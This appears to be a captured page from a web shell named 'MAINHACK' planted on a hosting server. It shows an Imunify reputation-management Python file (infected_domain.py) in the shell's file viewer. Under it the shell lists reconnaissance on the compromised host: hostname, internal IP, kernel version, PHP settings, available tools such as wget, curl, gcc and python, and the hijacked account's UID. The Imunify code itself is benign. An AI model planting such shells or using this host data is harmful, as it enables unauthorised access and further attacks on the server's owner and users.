[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: infected_domain.py
File is not writable. Editing disabled.
import itertools import logging import time from peewee import ( CharField, FloatField, IntegerField, TextField, ) from defence360agent.model import instance, Model logger = logging.getLogger(__name__) class InfectedDomainList(Model): """Domains with bad reputation, used for Reputation Management feature.""" id = IntegerField(primary_key=True) #: Username associated with the domain in hosting panel. username = CharField(null=True) #: Domain name. name = CharField(null=False) #: The kind of threat reported by reputation engine, #: e.g. "SOCIAL_ENGINEERING". threat_type = CharField(null=False) #: The time when Imunify first detected that the domain has bad reputation. timestamp = FloatField() #: The name of the reputation engine, e.g. "google-safe-browsing". vendor = TextField(null=True) class Meta: database = instance.db db_table = "infected_domain_list" @classmethod def get_by_user(cls, existing_users, offset=0, limit=50): # to be able to filter query results using existing_users, # limit/offset os applied on python side query = cls.select().order_by( cls.username, cls.name, cls.timestamp.desc() ) filtered_by_user = ( row for row in query.dicts() if row["username"] in existing_users ) grouped = itertools.groupby( filtered_by_user, key=lambda row: (row["username"], row["name"]) ) max_count = 0 result = [] for i, value in enumerate(grouped): max_count += 1 if (len(result) < limit) and (i >= offset): group, threats = value username, name = group result.append( { "username": username, "domain": name, "threats": [ { "type": t["threat_type"], "vendor": t["vendor"], "timestamp": t["timestamp"], } for t in threats ], } ) return result, max_count @classmethod def refresh_domains(cls, domains, domains_to_users): """ Update domain reputatuion info. If threat info already exists, do not update timestamp :param domains: reputation data from server :param domains_to_users: domain -> users mapping from hosting panel :return: """ existing = { (r["name"], r["threat_type"], r["vendor"]): r["timestamp"] for r in cls.select().dicts() } with instance.db.atomic(): cls.delete().execute() now = time.time() for domain_info in domains: domain = domain_info["query"] if domain not in domains_to_users: logger.warning("Users for domain %s not found.", domain) continue for user in domains_to_users[domain]: vendor = domain_info["vendor"] if vendor in ( "google-safe-browsing", "yandex-safe-browsing", ): threat_type = domain_info["details"]["threat_type"] elif vendor == "spamhaus": threat_type = domain_info["details"] elif vendor in ("phishtank", "openphish"): # https://cloudlinux.atlassian.net/wiki/spaces/IPT/pages/929759302/4.1+Multiple+vendors+in+Reputation+Management+ver.4.2 # noqa: E501 threat_type = "spam domain" else: threat_type = "THREAT_TYPE_UNSPECIFIED" timestamp = existing.get( (domain, threat_type, vendor), now ) cls.create( username=user, name=domain, threat_type=threat_type, vendor=vendor, timestamp=timestamp, )
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.07 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A